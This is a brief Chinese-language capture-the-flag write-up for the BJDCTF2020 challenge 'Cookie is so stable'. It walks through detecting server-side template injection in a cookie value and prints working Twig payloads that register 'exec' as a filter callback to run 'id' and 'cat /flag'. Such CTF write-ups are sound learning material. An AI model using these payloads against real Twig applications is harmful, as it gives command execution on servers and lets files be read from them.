[BJDCTF2020]Cookie is so stable

首先这题flag模块有个登录页面

抓包

可以看到user=123，最后会返回hello 123，这里就很像ssti注入，输入user={{2*3}}

最后也是返回成功了，而且处理器是php，常见模块有：twig，smarty，blade
输入 user={{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}

这里可以断定，是twig模块，直接上payload：
user={{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}